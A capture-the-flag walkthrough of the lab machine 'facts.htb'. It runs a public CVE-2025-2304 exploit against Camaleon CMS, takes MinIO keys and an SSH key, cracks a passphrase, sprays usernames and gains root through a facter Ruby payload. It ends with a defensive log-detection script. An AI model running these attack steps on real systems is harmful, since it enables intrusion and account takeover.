Target information
IP address:
10.129.142.139 (not a fixed IP address)
Information gathering
ICMP check
PING 10.129.142.139 (10.129.142.139) 56(84) bytes of data.
64 bytes from 10.129.142.139: icmp_seq=1 ttl=63 time=118 ms
64 bytes from 10.129.142.139: icmp_seq=2 ttl=63 time=140 ms
64 bytes from 10.129.142.139: icmp_seq=3 ttl=63 time=162 ms
64 bytes from 10.129.142.139: icmp_seq=4 ttl=63 time=85.2 ms
--- 10.129.142.139 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3006ms
rtt min/avg/max/mdev = 85.235/126.498/162.291/28.490 ms
The network connection between the attacking machine and the target is good.
Firewall detection
# Nmap 7.98 scan initiated Sun Feb 1 13:25:25 2026 as: /usr/lib/nmap/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.142.139
Warning: 10.129.142.139 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.142.139
Host is up (0.17s latency).
All 65535 scanned ports on 10.129.142.139 are in ignored states.
Not shown: 64891 closed tcp ports (reset), 644 open|filtered tcp ports (no-response)
# Nmap done at Sun Feb 1 13:26:50 2026 -- 1 IP address (1 host up) scanned in 84.59 seconds
The target's firewall state could not be determined from the FIN scan.
Network port scan
TCP port scan results
# Nmap 7.98 scan initiated Sun Feb 1 13:40:15 2026 as: /usr/lib/nmap/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.142.139
Warning: 10.129.142.139 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.142.139
Host is up (0.086s latency).
Not shown: 62150 closed tcp ports (conn-refused), 3382 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
|_ 256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
80/tcp open http nginx 1.26.3 (Ubuntu)
|_http-server-header: nginx/1.26.3 (Ubuntu)
|_http-title: Did not follow redirect to http://facts.htb/
54321/tcp open http Golang net/http server
|_http-title: Did not follow redirect to http://10.129.142.139:9001
|_http-server-header: MinIO
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Accept-Ranges: bytes
| Content-Length: 303
| Content-Type: application/xml
| Server: MinIO
| Strict-Transport-Security: max-age=31536000; includeSubDomains
| Vary: Origin
| X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
| X-Amz-Request-Id: 189008F1F4D68427
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Sun, 01 Feb 2026 05:41:28 GMT
| <?xml version="1.0" encoding="UTF-8"?>
| <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/nice ports,/Trinity.txt.bak</Resource><RequestId>189008F1F4D68427</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
| GenericLines, Help, RTSPRequest, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 400 Bad Request
| Accept-Ranges: bytes
| Content-Length: 276
| Content-Type: application/xml
| Server: MinIO
| Strict-Transport-Security: max-age=31536000; includeSubDomains
| Vary: Origin
| X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
| X-Amz-Request-Id: 189008EDF3138576
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Sun, 01 Feb 2026 05:41:11 GMT
| <?xml version="1.0" encoding="UTF-8"?>
| <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>189008EDF3138576</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
| HTTPOptions:
| HTTP/1.0 200 OK
| Vary: Origin
| Date: Sun, 01 Feb 2026 05:41:11 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 90.85 ms 10.10.16.1
2 137.27 ms 10.129.142.139
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 1 13:41:43 2026 -- 1 IP address (1 host up) scanned in 88.65 seconds
UDP open port list scan results
# Nmap 7.98 scan initiated Sun Feb 1 13:44:14 2026 as: /usr/lib/nmap/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.142.139
Warning: 10.129.142.139 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.142.139
Host is up (0.20s latency).
All 65535 scanned ports on 10.129.142.139 are in ignored states.
Not shown: 65286 open|filtered udp ports (no-response), 249 closed udp ports (port-unreach)
# Nmap done at Sun Feb 1 13:48:21 2026 -- 1 IP address (1 host up) scanned in 247.08 seconds
UDP port detail scan results
(none)
The target is running Ubuntu Linux with three open services: 22/ssh, 80/http and 54321/http. Its primary domain is facts.htb, and the 54321/http service by default redirects requests to port 9001/http, which is not open.
Service probing
SSH service (port 22)
Use the ssh command to connect to the target and try to determine which login methods it accepts:
ssh root@facts.htb

The target's SSH service allows both key and password authentication.
Web application (port 54321)
During the port scanning phase we already obtained some banner information about port 54321 from the Nmap scan report:

The response headers contain a Server field with the value MinIO, so this web service appears to actually be a MinIO object store. The response body also reveals two URIs, /nice and /Trinity.txt.bak, which look like a bucket name and a file inside it.
Try the MinIO client tool: register the store as an alias and send a ping request to the web service: GitHub - minio/mc: Unix like utilities for object store

./minio_client alias set htb_facts http://facts.htb:54321
./minio_client ping htb_facts -c 4

The web service returns correctly formatted responses to the MinIO client, confirming it is a MinIO object storage service.
Web application (port 80)
Open the home page: http://facts.htb/

The site appears to be a small blog. Clicking the Start Exploring button leads to the post browsing page; the comment section under the posts shows three English names, Bob, Carol and Dave:

Viewing the page source, the head tag defines a twitter:image metadata entry whose URL path contains the directory name camaleon_cms:
<meta name="twitter:image" content="http://facts.htb/assets/camaleon_cms/image-not-found-fc3c0e66dc61abf74010e63ef65a2e23c4cb40a3320408f2711f82fdc22b503f.png">
Searching online for Camaleon CMS shows it is a content management system written in Ruby:

From the file ./config/system.json in the GitHub source we can also see that the CMS control panel path is /admin: camaleon-cms/config/system.json at master · owen2345/camaleon-cms · GitHub

Visiting http://facts.htb/admin directly brings up the admin login page:

Surprisingly, the CMS back end also offers new user registration. Click the Create an account link, create a new user and log in:

After logging in, click the username in the top right corner to open the Profile page; the current user has the lowest privilege role, Client:

and the Camaleon CMS version is v2.9.0.
Penetration testing
Exploiting the Camaleon CMS privilege escalation vulnerability
During service probing we found that the target's 80/http service runs Camaleon CMS, registered a low-privilege user to enter the admin back end, and then determined its version. An online search shows that this version of Camaleon CMS has a privilege escalation vulnerability, CVE-2025-2304: GitHub - d3vn0mi/cve-2025-2304-poc

Download the exploit script locally:
git clone https://github.com/d3vn0mi/cve-2025-2304-poc.git
Then run the exploit command:
python ./cve-2025-2304-poc/cve-2025-2304.py http://facts.htb -u misaka19008 -p "Asd310056"
Then refresh the page and log in again:

Administrator privileges obtained!
Obtaining keys to access a sensitive bucket
With administrator privileges, browse the back end. Clicking Settings => General Site opens the basic site configuration page, which has a Filesystem Settings tab:

This reveals the MinIO access credentials:
- Address: http://facts.htb:54321
- Access key: AKIAF27007C687BC0386
- Secret key: 5EJrV7Yq1XluNwsk2NzrY55gJNkg0xaRFcl0P7n5
Update the MinIO Client alias directly, entering the keys when prompted:
./minio_client alias set htb_facts http://facts.htb:54321
Then list the buckets:
./minio_client ls htb_facts

There is a bucket named internal; list its contents:
./minio_client ls htb_facts/internal

The bucket holds a backup of some user's home directory, including a .ssh directory; list its files:
./minio_client ls htb_facts/internal/.ssh

An SSH private key, id_ed25519, is found! Download it locally:
./minio_client get htb_facts/internal/.ssh/id_ed25519 ./htb_facts_sshkey
Brute-forcing the SSH username and private key passphrase
In the preceding steps we found the MinIO access keys and obtained an SSH private key. Now use the ssh2john tool to check whether the private key is encrypted:
ssh2john htb_facts_sshkey

The private key file is encrypted. Save the hash to a file and crack the passphrase with john:
john sshkey_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

The SSH key passphrase is found: dragonballz, but the username the private key belongs to is still unknown. After some analysis, the decision is to write a simple script that reads each username from a wordlist and runs the ssh command in a loop, using ssh's -o option to add a temporary setting that disables password authentication. This way, when a wrong username is read, ssh does not wait for password input but immediately prints a login failure message.
First build the username wordlist:
cewl -w word.lst http://facts.htb
Once it is built, write and run the loop script:
for i in $(cat word.lst); do
ssh $i@facts.htb -i ./htb_facts_sshkey -o PasswordAuthentication=no
done

The script reaches the correct username (the one after SECTION) and prompts for the key passphrase. Checking word.lst, the correct username is trivia:

System user credentials found:
- Username: trivia
- SSH key passphrase: dragonballz
Log in directly:
ssh trivia@facts.htb -i htb_facts_sshkey

SSH login successful!
Privilege escalation
Privilege escalation via sudo facter
After logging in, run sudo -l to query the current user's sudo rights; the trivia user can run /usr/bin/facter as root without a password:

An online search shows that this program is written in Ruby and summarises and displays detailed host system information. Its --custom-dir option points it at a directory containing .rb files, which lets it execute arbitrary Ruby scripts, and this can be used for privilege escalation: facter | GTFOBins

Create a folder misaka19008 in trivia's home directory and, inside it, a script file evil.rb that changes the root user's password:
evil=`echo 'root:Asd310056' | chpasswd`
puts evil
Give it execute permission, perform the privilege escalation, and then switch to the root user:
sudo facter --custom-dir=/home/trivia/misaka19008 x
su -

Privilege escalation successful!
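As an added defender-side example (not part of the original writeup), the following Python triage runs over constructed auth.log lines and flags the two server-visible traces of the steps above: the burst of "Invalid user" records that the username loop in the SSH section produces, and the sudo-as-root facter run whose --custom-dir points into a user-writable directory. The log lines, the source IP 10.10.16.5 and the writable-prefix list are assumptions made for this example.

```python
import re
from collections import defaultdict

# Constructed sample auth.log lines (not captured from the target). They mimic
# what sshd logs during the username loop and what sudo logs for the facter run.
SAMPLE_LOG = """\
Feb  1 14:02:01 facts sshd[2101]: Invalid user Bob from 10.10.16.5 port 40110
Feb  1 14:02:01 facts sshd[2103]: Invalid user Carol from 10.10.16.5 port 40112
Feb  1 14:02:02 facts sshd[2105]: Invalid user Dave from 10.10.16.5 port 40114
Feb  1 14:02:02 facts sshd[2107]: Invalid user SECTION from 10.10.16.5 port 40116
Feb  1 14:02:03 facts sshd[2109]: Accepted publickey for trivia from 10.10.16.5 port 40118 ssh2: ED25519 SHA256:constructed
Feb  1 14:10:44 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/facter --custom-dir=/home/trivia/misaka19008 x
Feb  1 09:00:00 facts sudo:   admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/facter os
"""
INVALID_USER = re.compile(r"sshd\[\d+\]: Invalid user (\S+) from (\S+)")
SUDO_CMD = re.compile(r"sudo:\s+(\S+) : .*USER=(\S+) ; COMMAND=(.*)$")
CUSTOM_DIR = re.compile(r"--custom-dir[= ](\S+)")
# Prefixes an unprivileged user can normally write to (assumption for this example).
WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

def invalid_user_bursts(lines, threshold=3):
    """Map source IP -> sorted usernames for IPs that tried >= threshold distinct
    nonexistent accounts; a wordlist loop yields one 'Invalid user' line per wrong name."""
    seen = defaultdict(set)
    for line in lines:
        m = INVALID_USER.search(line)
        if m:
            seen[m.group(2)].add(m.group(1))
    return {ip: sorted(u) for ip, u in seen.items() if len(u) >= threshold}

def facter_custom_dir_abuse(lines, writable=WRITABLE_PREFIXES):
    """Return (invoking user, dir) for facter runs as root via sudo whose --custom-dir
    is user-writable: facter loads every .rb file there, the GTFOBins pattern above."""
    hits = []
    for line in lines:
        m = SUDO_CMD.search(line)
        if not m or m.group(2) != "root":
            continue
        cmd = m.group(3)
        if not cmd.startswith("/usr/bin/facter"):
            continue
        d = CUSTOM_DIR.search(cmd)
        if d and d.group(1).startswith(writable):
            hits.append((m.group(1), d.group(1)))
    return hits

if __name__ == "__main__":
    entries = SAMPLE_LOG.splitlines()
    print("ssh user spray:", invalid_user_bursts(entries))
    print("facter custom-dir as root:", facter_custom_dir_abuse(entries))
```

Pointing the same two functions at a real /var/log/auth.log only requires replacing SAMPLE_LOG with the file's lines; the sudo rule itself is the thing to remove, since any --custom-dir run as root is equivalent to root shell access.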
